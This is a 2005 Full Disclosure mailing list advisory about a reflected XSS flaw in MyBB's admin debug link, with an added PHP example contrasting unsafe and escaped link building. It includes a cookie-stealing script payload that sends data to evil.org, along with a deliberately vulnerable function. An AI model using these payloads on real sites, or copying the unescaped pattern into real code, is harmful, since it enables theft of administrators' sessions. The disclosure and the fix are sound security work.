Full Disclosure mailing list archives

XSS VULN IN ALL MYBB VERSIONS (INCLUDING PR2)


From: "Parikh, Dominic" <Dominic.Parikh () stpauls richmond sch uk>
Date: Mon, 5 Sep 2005 14:15:58 +0100

XSS VULN IN ALL MYBB VERSIONS (INCLUDING PR2)
Vendor: given SEVEN days notice, no patch released!
Just to say, I am appalled with the fact that I contacted MyBB on the 30
August, and was originally not planning to go public.
However, because they have failed to release a patch I have decided to
alert the wider community.

At the bottom of every page shown to the admins is a debug link. 
Unfortunately, this fails to properly sanitize user input, so, for
example, you could try: 
'forumdisplay.php?fid=2&datecut=""><script>alert(document.cookie)</script>'

Although only admins can exploit this vuln, someone could send them a
link such as 
[forumdisplay.php?fid=2&datecut=""><script>window.location="http://evil.org/steal.php?cookie="+document.cookie</script>]
and ouch!

robokoder
fusionnx.com- The Web Developer's Resource Centre
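
Added example, not part of the original post and not MyBB's own code: a debug-link builder that copies the query string into an `href` unescaped, next to a hardened version that casts numeric parameters and escapes for the attribute context. The function names, the `debug=1` parameter and the link markup are assumptions made for illustration.

```php
<?php
// Added illustration; function names and markup are assumptions, not MyBB source.

// Vulnerable pattern: the current query string is copied into an href unescaped,
// so a value containing "> closes the attribute and the rest is parsed as HTML.
function debug_link_unsafe(string $script, array $query): string
{
    $pairs = [];
    foreach ($query as $key => $value) {
        $pairs[] = $key . '=' . $value;
    }
    $pairs[] = 'debug=1';   // hypothetical debug switch
    return '<a href="' . $script . '?' . implode('&', $pairs) . '">Debug</a>';
}

// Hardened pattern: numeric parameters are cast to int, everything else is
// URL-encoded, and the finished URL is HTML-escaped for the attribute context.
function debug_link_safe(string $script, array $query): string
{
    $numeric = ['fid', 'datecut'];   // parameters expected to be integers
    foreach ($numeric as $name) {
        if (isset($query[$name])) {
            $query[$name] = (int) $query[$name];
        }
    }
    $query['debug'] = 1;             // hypothetical debug switch
    $url = $script . '?' . http_build_query($query, '', '&');
    return '<a href="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '">Debug</a>';
}

// Constructed request modelled on the parameter value quoted in the report.
$query = ['fid' => '2', 'datecut' => '""><script>alert(document.cookie)</script>'];

echo debug_link_unsafe('forumdisplay.php', $query), "\n";
echo debug_link_safe('forumdisplay.php', $query), "\n";
```

The second line of output keeps `datecut` as `0` and contains no markup from the request, while the first reproduces the injected tag verbatim.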



